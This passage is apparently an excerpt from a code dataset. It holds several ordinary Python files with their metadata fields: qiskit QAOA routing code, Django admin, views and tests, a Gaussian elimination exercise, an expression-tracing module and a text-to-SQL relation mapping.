linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
# Last node
last_var = "X" + str(edge[0]) + str(no_nodes - 1)
linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
else: # Now quadratic cost for travelling between nodes apart from depot
for j in range(no_nodes - 2):
pairing = (
"X" + str(edge[0]) + str(j + 1),
"X" + str(edge[1]) + str(j + 2),
)
quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
# Backwards directions
pairing = (
"X" + str(edge[1]) + str(j + 1),
"X" + str(edge[0]) + str(j + 2),
)
quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
for node in cluster.nodes:
if node == depot_info["id"]: # Not depot
continue
# If node is not connected to the depot, increase cost when starting at that node
if (depot_info["id"], node) not in connected_elems:
var = "X" + str(node) + str(1)
if var in linear:
linear[var] += A
else:
linear[var] = A
# Likewise if the ending node is not connected to the depot
var = "X" + str(node) + str(no_nodes - 1)
if var in linear:
linear[var] += A
else:
linear[var] = A
for node2 in cluster.nodes:
if (
node2 != depot_info["id"]
and node2 != node
and (node, node2) not in cluster.edges
): # Not depot, and different node, and if the two nodes are not connected, add penalty when travelling between them
for j in range(no_nodes - 2):
# Adding cost for travelling from node to node2,
pairing = (
"X" + str(node) + str(j + 1),
"X" + str(node2) + str(j + 2),
)
if pairing in quadratic:
quadratic[pairing] += A
else:
quadratic[pairing] = A
# Reverse Direction
pairing = (
"X" + str(node2) + str(j + 1),
"X" + str(node) + str(j + 2),
)
if pairing in quadratic:
quadratic[pairing] += A
else:
quadratic[pairing] = A
# Input linear and quadratic terms for minimizing qubo objective function
constrained_qp.minimize(linear=linear, quadratic=quadratic)
# Now add constraints to make sure each node is visited exactly once:
node_constraint = {}
for r in range(no_nodes - 1):
var = "X" + str(node) + str(r + 1)
node_constraint[var] = 1
constrained_qp.linear_constraint(
linear=node_constraint,
sense="==",
rhs=1,
name="visit_node{}_once".format(node),
)
# Now add constraints to make sure each vehicle is only at one node for each timestep:
for r in range(no_nodes - 1):
timestep_constraint = {}
for node in cluster.nodes:
if node == depot_info["id"]:
continue
var = "X" + str(node) + str(r + 1)
timestep_constraint[var] = 1
constrained_qp.linear_constraint(
linear=timestep_constraint,
sense="==",
rhs=1,
name="timestep{}_one_node".format(r + 1),
)
# Convert unconstrained to QUBO
converter = QuadraticProgramToQubo(penalty=A)
qubo = converter.convert(constrained_qp)
# Append each QP to QUBO
qubos.append(qubo)
return qubos
def solve_qubo_qaoa(qubo, p, backend, points=None):
"""
Create QAOA from given qubo, and solves for both the exact value and the QAOA
Args:
qubo (object): qiskit QUBO object
p (int): the number of layers in the QAOA circuit (p value)
Returns:
exact_result (dict): the exact result of the MinimumEigenOptimizer
qaoa_result (dict): the result of running the QAOA
"""
exact_mes = NumPyMinimumEigensolver()
exact = MinimumEigenOptimizer(exact_mes)
exact_result = exact.solve(qubo)
op, offset = qubo.to_ising()
if backend == "statevector_simulator":
method = Aer.get_backend("statevector_simulator")
elif backend == "matrix_product_state":
method = QasmSimulator(method="matrix_product_state")
num_qubits = qubo.get_num_vars()
quantum_instance = QuantumInstance(
method,
shots=(2 ** np.sqrt(num_qubits)) * 2048,
seed_simulator=aqua_globals.random_seed,
seed_transpiler=aqua_globals.random_seed,
)
qaoa_meas = QAOA(
quantum_instance=quantum_instance,
p=p,
initial_point=list(2 * np.pi * np.random.random(2 * p)),
)
qaoa = MinimumEigenOptimizer(qaoa_meas)
qaoa_result = qaoa.solve(qubo)
num_qubits = qaoa.min_eigen_solver.get_optimal_circuit().num_qubits
return qaoa_result, exact_result, offset, num_qubits
def interp_point(optimal_point):
"""Method to interpolate to next point from the optimal point found from the previous layer
Args:
optimal_point (np.array): Optimal point from previous layer
Returns:
point (list): the informed next point
"""
optimal_point = list(optimal_point)
p = int(len(optimal_point) / 2)
gammas = [0] + optimal_point[0:p] + [0]
betas = [0] + optimal_point[p : 2 * p] + [0]
interp_gammas = [0] + gammas
interp_betas = [0] + betas
for i in range(1, p + 2):
interp_gammas[i] = gammas[i - 1] * (i - 1) / p + gammas[i] * (p + 1 - i) / p
interp_betas[i] = betas[i - 1] * (i - 1) / p + betas[i] * (p + 1 - i) / p
point = interp_gammas[1 : p + 2] + interp_betas[1 : p + 2]
return point
def get_fourier_points(last_expectation_value, p):
""""""
points = (
list(last_expectation_value[:p]) + [0] + list(last_expectation_value[p:]) + [0]
)
print(points)
return points
def index_to_selection(i, num_assets):
"""
Creates an index for the string value suggestion (used in print_result)
Args:
i (int): the index of the given string
num_assets (int): the number of qubits in the given index string
Returns:
x (dict): dictionary result of the given index in binary
"""
s = "{0:b}".format(i).rjust(num_assets)
x = np.array([1 if s[i] == "1" else 0 for i in reversed(range(num_assets))])
return x
def print_result(qubo, qaoa_result, num_qubits, exact_value, backend):
"""
Prints the results of the QAOA in a nice form
Args:
qubo (object): qiskit QUBO object
result (dict): the result of the QAOA
num_qubits (int): the number of qubits in the QAOA circuit
"""
if backend == "statevector_simulator":
eigenvector = (
qaoa_result.min_eigen_solver_result["eigenstate"]
if isinstance(qaoa_result.min_eigen_solver_result["eigenstate"], np.ndarray)
else qaoa_result.min_eigen_solver_result["eigenstate"].to_matrix()
)
probabilities = np.abs(eigenvector) ** 2
elif backend == "matrix_product_state":
probabilities = []
for eigenstate in qaoa_result.min_eigen_solver_result["eigenstate"]:
probabilities.append(
qaoa_result.min_eigen_solver_result["eigenstate"][eigenstate] / 1024
)
i_sorted = reversed(np.argsort(probabilities))
print("----------------- Full result ---------------------")
print("index\tselection\t\tvalue\t\tprobability")
print("---------------------------------------------------")
exact_probs = []
solution_data = {}
for index, i in enumerate(i_sorted):
x = index_to_selection(i, num_qubits)
probability = probabilities[i]
if index == 0 or index == 1:
print(
"%d\t%10s\t%.4f\t\t%.4f"
% (index, x, qubo.objective.evaluate(x), probability)
)
if qubo.objective.evaluate(x) == exact_value:
print(
"%d\t%10s\t%.4f\t\t%.4f"
% (index, x, qubo.objective.evaluate(x), probability)
)
exact_probs.append(probability)
solution_data[f"{x}"] = {
"index": index,
"energy": qubo.objective.evaluate(x),
"probability": probability,
}
print("\n")
return exact_probs, solution_data
def assign_parameters(circuit, params_expr, params):
"""
Args:
circuit ([type]): [description]
params_expr ([type]): [description]
params ([type]): [description]
Returns:
[type]: [description]
"""
# Assign params_expr -> params
circuit2 = circuit.assign_parameters(
{params_expr[i]: params[i] for i in range(len(params))}, inplace=False
)
return circuit2
def to_hamiltonian_dicts(quadratic_program: QuadraticProgram):
"""
Converts a Qiskit QuadraticProgram for QAOA to pair of dictionaries representing the
Hamiltonian. Based on qiskit.optimization.QuadraticProgram.to_ising.
Args:
quadratic_program (QuadraticProgram): Qiskit QuadraticProgram representing a
QAOA problem
Returns:
num_nodes (int): Integer number of qubits
linear_terms (defaultdict[int, float]): Coefficients of Z_i terms in the
Hamiltonian.
quadratic_terms (defaultdict[Tuple[int, int], float]): Coefficients of Z_i Z_j
terms in the Hamiltonian
"""
# if problem has variables that are not binary, raise an error
if quadratic_program.get_num_vars() > quadratic_program.get_num_binary_vars():
raise ValueError(
"The type of variable must be a binary variable. "
"Use a QuadraticProgramToQubo converter to convert "
"integer variables to binary variables. "
"If the problem contains continuous variables, "
"currently we can not apply VQE/QAOA directly. "
"you might want to use an ADMM optimizer "
"for the problem. "
)
# if constraints exist, raise an error
if quadratic_program.linear_constraints or quadratic_program.quadratic_constraints:
raise ValueError(
"An constraint exists. "
"The method supports only model with no constraints. "
"Use a QuadraticProgramToQubo converter. "
"It converts inequality constraints to equality "
"constraints, and then, it converters equality "
"constraints to penalty terms of the object function."
)
# initialize Hamiltonian.
num_nodes = quadratic_program.get_num_vars()
linear_terms = defaultdict(float)
quadratic_terms = defaultdict(float)
# set a sign corresponding to a maximized or minimized problem.
# sign == 1 is for minimized problem. sign == -1 is for maximized problem.
sense = quadratic_program.objective.sense.value
# convert linear parts of the object function into Hamiltonian.
for i, coeff in quadratic_program.objective.linear.to_dict().items():
linear_terms[i] -= sense * coeff / 2
# create Pauli terms
for pair, coeff in quadratic_program.objective.quadratic.to_dict().items():
weight = sense * coeff / 4
i, j = sorted(pair)
if i != j:
quadratic_terms[i, j] += weight
linear_terms[i] -= weight
linear_terms[j] -= weight
return num_nodes, linear_terms, quadratic_terms
| en | 0.742067 | A function to build QUBO formulations using qiskit clusters (list): A list of `networkX` graph objects that contain the clusters (including depot) depot_info (dict): A dictionary consisting of the depot information A (int): A penalty (defualt is `A=30` as discussed in Feld) Returns: list: A list of QUBO formulations # vars_lookup = create_vars_lookup(cluster, depot_id) Create vars_look_up for indexing # Create binary variables for each node at each timestep # Not including depot # no_timesteps = no_nodes - depot # Calculate constraint coefficients (linear and quadratic terms) # Linear cost for travelling from depot to a node in the first and last step # Starting node # Last node # Allowing for having the depot as the 2nd node on the ordered edge pair (so just reversing the code above) # Starting node # Last node # Now quadratic cost for travelling between nodes apart from depot # Backwards directions # Not depot # If node is not connected to the depot, increase cost when starting at that node # Likewise if the ending node is not connected to the depot # Not depot, and different node, and if the two nodes are not connected, add penalty when travelling between them # Adding cost for travelling from node to node2, # Reverse Direction # Input linear and quadratic terms for minimizing qubo objective function # Now add constraints to make sure each node is visited exactly once: # Now add constraints to make sure each vehicle is only at one node for each timestep: # Convert unconstrained to QUBO # Append each QP to QUBO Create QAOA from given qubo, and solves for both the exact value and the QAOA Args: qubo (object): qiskit QUBO object p (int): the number of layers in the QAOA circuit (p value) Returns: exact_result (dict): the exact result of the MinimumEigenOptimizer qaoa_result (dict): the result of running the QAOA Method to interpolate to next point from the optimal point found from the previous layer Args: optimal_point (np.array): Optimal point from previous layer Returns: point (list): the informed next point Creates an index for the string value suggestion (used in print_result) Args: i (int): the index of the given string num_assets (int): the number of qubits in the given index string Returns: x (dict): dictionary result of the given index in binary Prints the results of the QAOA in a nice form Args: qubo (object): qiskit QUBO object result (dict): the result of the QAOA num_qubits (int): the number of qubits in the QAOA circuit Args: circuit ([type]): [description] params_expr ([type]): [description] params ([type]): [description] Returns: [type]: [description] # Assign params_expr -> params Converts a Qiskit QuadraticProgram for QAOA to pair of dictionaries representing the Hamiltonian. Based on qiskit.optimization.QuadraticProgram.to_ising. Args: quadratic_program (QuadraticProgram): Qiskit QuadraticProgram representing a QAOA problem Returns: num_nodes (int): Integer number of qubits linear_terms (defaultdict[int, float]): Coefficients of Z_i terms in the Hamiltonian. quadratic_terms (defaultdict[Tuple[int, int], float]): Coefficients of Z_i Z_j terms in the Hamiltonian # if problem has variables that are not binary, raise an error # if constraints exist, raise an error # initialize Hamiltonian. # set a sign corresponding to a maximized or minimized problem. # sign == 1 is for minimized problem. sign == -1 is for maximized problem. # convert linear parts of the object function into Hamiltonian. # create Pauli terms | 2.189062 | 2 |
survey/admin.py | suger-luck/health | 0 | 6617402 | from django.contrib import admin
from survey.models import user, questions
# Register your models here.
# 注册用户类
class UserTabularInline(admin.TabularInline):
"""在编辑页中显示子类信息(表格的形式显示)"""
# 关联子类对象
model = questions
list_display = ['submit_time']
# 显示额外的编辑对象
extra = 1
class UserAdmin(admin.ModelAdmin):
inlines = [UserTabularInline]
admin.site.register(user, UserAdmin)
admin.site.register(questions) | from django.contrib import admin
from survey.models import user, questions
# Register your models here.
# 注册用户类
class UserTabularInline(admin.TabularInline):
"""在编辑页中显示子类信息(表格的形式显示)"""
# 关联子类对象
model = questions
list_display = ['submit_time']
# 显示额外的编辑对象
extra = 1
class UserAdmin(admin.ModelAdmin):
inlines = [UserTabularInline]
admin.site.register(user, UserAdmin)
admin.site.register(questions) | zh | 0.772461 | # Register your models here. # 注册用户类 在编辑页中显示子类信息(表格的形式显示) # 关联子类对象 # 显示额外的编辑对象 | 2.079622 | 2 |
hw2/lab2.py | mironalex/CN | 1 | 6617403 | <filename>hw2/lab2.py
from functools import reduce
from hw1.ex12 import solve_ex1
import numpy as np
import random
def solve_diagonal_system(system, result):
assert len(system.shape) == 2
assert system.shape[0] == system.shape[1], "Must be a square matrix"
solution = np.zeros((system.shape[1], 1))
lines, columns = system.shape
for idx in reversed(range(0, lines)):
line_offset = reduce(lambda accumulator, comb: accumulator + comb[0] * comb[1],
zip(system[idx, idx + 1:], solution[idx + 1:, 0]),
0)
solution[idx, 0] = (result[idx, 0] - line_offset) / system[idx][idx]
return solution
def reduce_system(system, result, column=0):
if column == system.shape[1]:
return
idx = column + system[column:, column].argmax()
system[[column, idx]] = system[[idx, column]]
result[[column, idx]] = result[[idx, column]]
for line in range(column + 1, system.shape[0]):
epsilon = solve_ex1()
if -epsilon <= system[line, column] <= epsilon:
continue
normalization_factor = system[column, column] / system[line, column]
system[line] *= normalization_factor
system[line] -= system[column]
result[line, 0] *= normalization_factor
result[line, 0] -= result[column, 0]
reduce_system(system, result, column=column + 1)
def solve_system(system, result):
internal_system = np.copy(system)
internal_result = np.copy(result)
reduce_system(internal_system, internal_result)
return solve_diagonal_system(internal_system, internal_result)
def generate_random_system(size):
system = []
for i in range(0, size):
current_line = []
for j in range(0, size):
current_line.append(random.random() * 10)
system.append(current_line)
result = []
for i in range(0, size):
result.append([random.random() * 10])
return np.array(system), result
def flip(vali_list):
result = []
for x in vali_list:
result.append(x[0])
return result
if __name__ == '__main__':
sys_result_pair = generate_random_system(100)
system = sys_result_pair[0]
result = sys_result_pair[1]
try:
determinant = np.linalg.det(system)
if determinant == 0:
raise ValueError("Error: Determinant is 0")
except ValueError as error:
print(repr(error))
exit(1)
solution = solve_system(
system,
result
)
np_solution = np.linalg.solve(system, result)
"""
print("Solution =", solution)
print("NP Solution =", np_solution)
"""
solution_norm = solution - np_solution
print("Norma solutia noastra - solutia biblioteca =", np.linalg.norm(solution_norm))
solution_mul_sys = np.matmul(system, solution) - result
print("Norma solutia noastra * sistemul - rezultatul =", np.linalg.norm(solution_mul_sys))
np_solution_mul_sys = np.matmul(system, np_solution) - result
print("Norma solutia biblioteca * sistemul - rezultatul =", np.linalg.norm(np_solution_mul_sys))
"""
solution_result = np.matmul(system, solution)
print("A * x_sol =", solution_result)
print("Result = ", result)
print("Norm: ", np.linalg.norm(result - solution_result))
"""
| <filename>hw2/lab2.py
from functools import reduce
from hw1.ex12 import solve_ex1
import numpy as np
import random
def solve_diagonal_system(system, result):
assert len(system.shape) == 2
assert system.shape[0] == system.shape[1], "Must be a square matrix"
solution = np.zeros((system.shape[1], 1))
lines, columns = system.shape
for idx in reversed(range(0, lines)):
line_offset = reduce(lambda accumulator, comb: accumulator + comb[0] * comb[1],
zip(system[idx, idx + 1:], solution[idx + 1:, 0]),
0)
solution[idx, 0] = (result[idx, 0] - line_offset) / system[idx][idx]
return solution
def reduce_system(system, result, column=0):
if column == system.shape[1]:
return
idx = column + system[column:, column].argmax()
system[[column, idx]] = system[[idx, column]]
result[[column, idx]] = result[[idx, column]]
for line in range(column + 1, system.shape[0]):
epsilon = solve_ex1()
if -epsilon <= system[line, column] <= epsilon:
continue
normalization_factor = system[column, column] / system[line, column]
system[line] *= normalization_factor
system[line] -= system[column]
result[line, 0] *= normalization_factor
result[line, 0] -= result[column, 0]
reduce_system(system, result, column=column + 1)
def solve_system(system, result):
internal_system = np.copy(system)
internal_result = np.copy(result)
reduce_system(internal_system, internal_result)
return solve_diagonal_system(internal_system, internal_result)
def generate_random_system(size):
system = []
for i in range(0, size):
current_line = []
for j in range(0, size):
current_line.append(random.random() * 10)
system.append(current_line)
result = []
for i in range(0, size):
result.append([random.random() * 10])
return np.array(system), result
def flip(vali_list):
result = []
for x in vali_list:
result.append(x[0])
return result
if __name__ == '__main__':
sys_result_pair = generate_random_system(100)
system = sys_result_pair[0]
result = sys_result_pair[1]
try:
determinant = np.linalg.det(system)
if determinant == 0:
raise ValueError("Error: Determinant is 0")
except ValueError as error:
print(repr(error))
exit(1)
solution = solve_system(
system,
result
)
np_solution = np.linalg.solve(system, result)
"""
print("Solution =", solution)
print("NP Solution =", np_solution)
"""
solution_norm = solution - np_solution
print("Norma solutia noastra - solutia biblioteca =", np.linalg.norm(solution_norm))
solution_mul_sys = np.matmul(system, solution) - result
print("Norma solutia noastra * sistemul - rezultatul =", np.linalg.norm(solution_mul_sys))
np_solution_mul_sys = np.matmul(system, np_solution) - result
print("Norma solutia biblioteca * sistemul - rezultatul =", np.linalg.norm(np_solution_mul_sys))
"""
solution_result = np.matmul(system, solution)
print("A * x_sol =", solution_result)
print("Result = ", result)
print("Norm: ", np.linalg.norm(result - solution_result))
"""
| en | 0.411053 | print("Solution =", solution) print("NP Solution =", np_solution) solution_result = np.matmul(system, solution) print("A * x_sol =", solution_result) print("Result = ", result) print("Norm: ", np.linalg.norm(result - solution_result)) | 2.846333 | 3 |
movies/views.py | mikeku1116/django-filter-package | 0 | 6617404 | from django.shortcuts import render
from .models import Movie
from .filters import MovieFilter
def index(request):
movies = Movie.objects.all()
movieFilter = MovieFilter(queryset=movies)
if request.method == "POST":
movieFilter = MovieFilter(request.POST, queryset=movies)
context = {
'movieFilter': movieFilter
}
return render(request, 'movies/index.html', context)
| from django.shortcuts import render
from .models import Movie
from .filters import MovieFilter
def index(request):
movies = Movie.objects.all()
movieFilter = MovieFilter(queryset=movies)
if request.method == "POST":
movieFilter = MovieFilter(request.POST, queryset=movies)
context = {
'movieFilter': movieFilter
}
return render(request, 'movies/index.html', context)
| none | 1 | 1.978744 | 2 | |
hokudai_furima/product/tests.py | TetsuFe/hokuma | 1 | 6617405 | from django.test import TestCase, Client
from django.urls import reverse
from django.utils import timezone
import datetime
from hokudai_furima.account.models import User
from hokudai_furima.product.models import Product
from hokudai_furima.chat.models import Chat, Talk
def create_user(username, email, password):
user = User.objects.create_user(username=username, email=email, password=password, is_active=True)
return user
def comfirm_site_rules(user):
user.is_rules_confirmed = True
user.save()
return user
def activate_user(user):
user.is_active = True
user.save()
return user
def create_product(user, title, description, price):
product = Product.objects.create(seller=user, title=title, description=description, price=price)
return product
def create_chat(product, product_wanting_user, product_seller):
chat = Chat.objects.create(product=product,
product_wanting_user=product_wanting_user,
product_seller=product_seller,
created_date=timezone.now())
return chat
def add_talk_to_chat(talker, chat, sentence, days):
time = timezone.now() + datetime.timedelta(days=days)
talk = Talk.objects.create(talker=talker, chat=chat, sentence=sentence, created_date=time)
chat.talk_set.add(talk)
class ProductDirectChatViewTests(TestCase):
def test_two_past_questions(self):
"""
The questions index page may display multiple questions.
"""
seller = create_user('test1', '<EMAIL>', 'hokuma1')
wanting_user = create_user('test2', '<EMAIL>', 'hokuma2')
seller = activate_user(seller)
wanting_user = activate_user(wanting_user)
seller = comfirm_site_rules(seller)
wanting_user = comfirm_site_rules(wanting_user)
product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
chat = create_chat(product, wanting_user, seller)
add_talk_to_chat(talker=wanting_user, chat=chat, sentence='購入希望送らせていただきました', days=-2)
add_talk_to_chat(talker=seller, chat=chat, sentence='購入希望ありがとうございます!', days=-1)
client = Client()
client.force_login(seller, backend='django.contrib.auth.backends.ModelBackend')
response = client.get(reverse('product:product_direct_chat',
kwargs={'product_pk': product.pk, 'wanting_user_pk': wanting_user.pk}))
self.assertQuerysetEqual(
response.context['talks'],
['<Talk: Talk object (1)>', '<Talk: Talk object (2)>']
)
class ProductDetailsViewTests(TestCase):
def test_product_details(self):
seller = create_user('test1', '<EMAIL>', 'hokuma1')
seller = activate_user(seller)
seller = comfirm_site_rules(seller)
product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
client = Client()
response = client.get(reverse('product:product_details',
kwargs={'pk': product.pk}))
self.assertEqual(
response.context['product'],
product
)
| from django.test import TestCase, Client
from django.urls import reverse
from django.utils import timezone
import datetime
from hokudai_furima.account.models import User
from hokudai_furima.product.models import Product
from hokudai_furima.chat.models import Chat, Talk
def create_user(username, email, password):
user = User.objects.create_user(username=username, email=email, password=password, is_active=True)
return user
def comfirm_site_rules(user):
user.is_rules_confirmed = True
user.save()
return user
def activate_user(user):
user.is_active = True
user.save()
return user
def create_product(user, title, description, price):
product = Product.objects.create(seller=user, title=title, description=description, price=price)
return product
def create_chat(product, product_wanting_user, product_seller):
chat = Chat.objects.create(product=product,
product_wanting_user=product_wanting_user,
product_seller=product_seller,
created_date=timezone.now())
return chat
def add_talk_to_chat(talker, chat, sentence, days):
time = timezone.now() + datetime.timedelta(days=days)
talk = Talk.objects.create(talker=talker, chat=chat, sentence=sentence, created_date=time)
chat.talk_set.add(talk)
class ProductDirectChatViewTests(TestCase):
def test_two_past_questions(self):
"""
The questions index page may display multiple questions.
"""
seller = create_user('test1', '<EMAIL>', 'hokuma1')
wanting_user = create_user('test2', '<EMAIL>', 'hokuma2')
seller = activate_user(seller)
wanting_user = activate_user(wanting_user)
seller = comfirm_site_rules(seller)
wanting_user = comfirm_site_rules(wanting_user)
product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
chat = create_chat(product, wanting_user, seller)
add_talk_to_chat(talker=wanting_user, chat=chat, sentence='購入希望送らせていただきました', days=-2)
add_talk_to_chat(talker=seller, chat=chat, sentence='購入希望ありがとうございます!', days=-1)
client = Client()
client.force_login(seller, backend='django.contrib.auth.backends.ModelBackend')
response = client.get(reverse('product:product_direct_chat',
kwargs={'product_pk': product.pk, 'wanting_user_pk': wanting_user.pk}))
self.assertQuerysetEqual(
response.context['talks'],
['<Talk: Talk object (1)>', '<Talk: Talk object (2)>']
)
class ProductDetailsViewTests(TestCase):
def test_product_details(self):
seller = create_user('test1', '<EMAIL>', 'hokuma1')
seller = activate_user(seller)
seller = comfirm_site_rules(seller)
product = create_product(seller, 'テスト商品', 'テスト商品です', 100)
client = Client()
response = client.get(reverse('product:product_details',
kwargs={'pk': product.pk}))
self.assertEqual(
response.context['product'],
product
)
| en | 0.61382 | The questions index page may display multiple questions. | 2.314805 | 2 |
gerryopt/trace/_cmp_op.py | pjrule/gerryopt | 0 | 6617406 | <gh_stars>0
"""Tracing for comparison expressions."""
from itertools import product
from typing import Union
from gerryopt.trace._expr import TracedExpr
from gerryopt.trace._constant import Constant, coerce_constants
from gerryopt.trace.opcodes import (CmpOpcode, CMP_OPCODE_TO_REPR,
CMP_OPCODE_TO_METHOD_NAME)
from gerryopt.trace.types import (is_scalar, is_ndarray, is_possibly_ndarray,
scalar_type, size_intersection, type_union,
type_product, make_ndarray, binary_broadcast,
Scalar)
Val = Union[TracedExpr, Scalar]
class CmpOp(TracedExpr):
"""A binary operation expression."""
left: TracedExpr
right: TracedExpr
op: CmpOpcode
def __init__(self, left: Val, right: Val, op: CmpOpcode):
self.left, self.right = coerce_constants(left, right)
self.op = op
self.dtype = None
for (lhs, rhs) in type_product(self.left.dtype, self.right.dtype):
self.dtype = type_union(self.dtype,
binary_broadcast(bool, lhs, rhs))
def __repr__(self):
opcode_repr = CMP_OPCODE_TO_REPR[self.op]
return f'CmpOp({opcode_repr}, {self.left}, {self.right})'
# Dynamically inject comparison tracing into generic expressions.
for op, name in CMP_OPCODE_TO_METHOD_NAME.items():
setattr(TracedExpr,
f'__{name}__',
lambda self, other, _op=op: CmpOp(self, other, _op))
| """Tracing for comparison expressions."""
from itertools import product
from typing import Union
from gerryopt.trace._expr import TracedExpr
from gerryopt.trace._constant import Constant, coerce_constants
from gerryopt.trace.opcodes import (CmpOpcode, CMP_OPCODE_TO_REPR,
CMP_OPCODE_TO_METHOD_NAME)
from gerryopt.trace.types import (is_scalar, is_ndarray, is_possibly_ndarray,
scalar_type, size_intersection, type_union,
type_product, make_ndarray, binary_broadcast,
Scalar)
Val = Union[TracedExpr, Scalar]
class CmpOp(TracedExpr):
"""A binary operation expression."""
left: TracedExpr
right: TracedExpr
op: CmpOpcode
def __init__(self, left: Val, right: Val, op: CmpOpcode):
self.left, self.right = coerce_constants(left, right)
self.op = op
self.dtype = None
for (lhs, rhs) in type_product(self.left.dtype, self.right.dtype):
self.dtype = type_union(self.dtype,
binary_broadcast(bool, lhs, rhs))
def __repr__(self):
opcode_repr = CMP_OPCODE_TO_REPR[self.op]
return f'CmpOp({opcode_repr}, {self.left}, {self.right})'
# Dynamically inject comparison tracing into generic expressions.
for op, name in CMP_OPCODE_TO_METHOD_NAME.items():
setattr(TracedExpr,
f'__{name}__',
lambda self, other, _op=op: CmpOp(self, other, _op)) | en | 0.803874 | Tracing for comparison expressions. A binary operation expression. # Dynamically inject comparison tracing into generic expressions. | 2.524147 | 3 |
seq2seq/preprocess/get_relation2id_dict.py | JiexingQi/picard | 2 | 6617407 |
def get_relation2id_dict(choice = "Default", use_coref = False, use_dependency = False):
from .constants import RELATIONS, MAX_RELATIVE_DIST
current_relation = [r for r in RELATIONS]
if not use_coref:
current_relation = [r for r in current_relation if r not in ['co_relations', 'coref_relations']]
if not use_dependency:
current_relation = [r for r in current_relation if r not in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']]
if choice in ["Default"]:
idx_list = [i for i in range(1, len(current_relation)+1)]
elif choice == "DefaultWithoutSchemaEncoding":
schema_encoding_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if src_type in ["table", "column", "*"] and tgt_type in ["table", "column", "*"]:
schema_encoding_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_encoding_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_encoding_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "DefaultWithoutSchemaLinking":
schema_linking_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if (src_type in ["question"] and tgt_type in ["table", "column", "*"]) or (tgt_type in ["question"] and src_type in ["table", "column", "*"]):
schema_linking_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_linking_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_linking_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['question-question-generic'] + ['question-question-dist' + str(i) if i != 0 else 'question-question-identity' for i in range(- MAX_RELATIVE_DIST, MAX_RELATIVE_DIST + 1)]:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
elif choice == "Dependency_MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
else:
raise NotImplementedError
RELATION2ID_DICT = dict(zip(current_relation, idx_list))
idx_list.append(0)
current_relation.append("None")
ID2RELATION_DICT = dict(zip(idx_list, current_relation))
return RELATION2ID_DICT, ID2RELATION_DICT, max(idx_list) |
def get_relation2id_dict(choice = "Default", use_coref = False, use_dependency = False):
from .constants import RELATIONS, MAX_RELATIVE_DIST
current_relation = [r for r in RELATIONS]
if not use_coref:
current_relation = [r for r in current_relation if r not in ['co_relations', 'coref_relations']]
if not use_dependency:
current_relation = [r for r in current_relation if r not in ['Forward-Syntax', 'Backward-Syntax', 'None-Syntax']]
if choice in ["Default"]:
idx_list = [i for i in range(1, len(current_relation)+1)]
elif choice == "DefaultWithoutSchemaEncoding":
schema_encoding_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if src_type in ["table", "column", "*"] and tgt_type in ["table", "column", "*"]:
schema_encoding_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_encoding_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_encoding_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "DefaultWithoutSchemaLinking":
schema_linking_rel = []
for rel in current_relation:
split_rel = rel.split("-")
try:
src_type, tgt_type = split_rel[0], split_rel[1]
except:
continue
if (src_type in ["question"] and tgt_type in ["table", "column", "*"]) or (tgt_type in ["question"] and src_type in ["table", "column", "*"]):
schema_linking_rel.append(rel)
current_relation = [r for r in current_relation if r not in schema_linking_rel]
idx_list = [i for i in range(1, len(current_relation)+1)]
for rel in schema_linking_rel:
current_relation.append(rel)
idx_list.append(0)
elif choice == "MinType":
idx_list = []
dummy_idx = 8
for rel in current_relation:
if rel in ['question-column-partialmatch', 'question-table-partialmatch']:
idx_list.append(1)
elif rel in ['question-column-exactmatch', 'question-table-exactmatch']:
idx_list.append(2)
elif rel in ['question-column-valuematch']:
idx_list.append(3)
elif rel in ['question-table-nomatch', 'question-column-nomatch']:
idx_list.append(4)
elif rel in ['table-column-pk']:
idx_list.append(5)
elif rel in ['table-column-has']:
idx_list.append(6)
elif rel in ['column-column-fk']:
idx_list.append(7)
elif rel in ['question-question-generic'] + ['question-question-dist' + str(i) if i != 0 else 'question-question-identity' for i in range(- MAX_RELATIVE_DIST, MAX_RELATIVE_DIST + 1)]:
idx_list.append(dummy_idx)
dummy_idx += 1
else:
idx_list.append(0)
elif choice == "Dependency_MinType":
idx_list = []
dummy_idx = 8
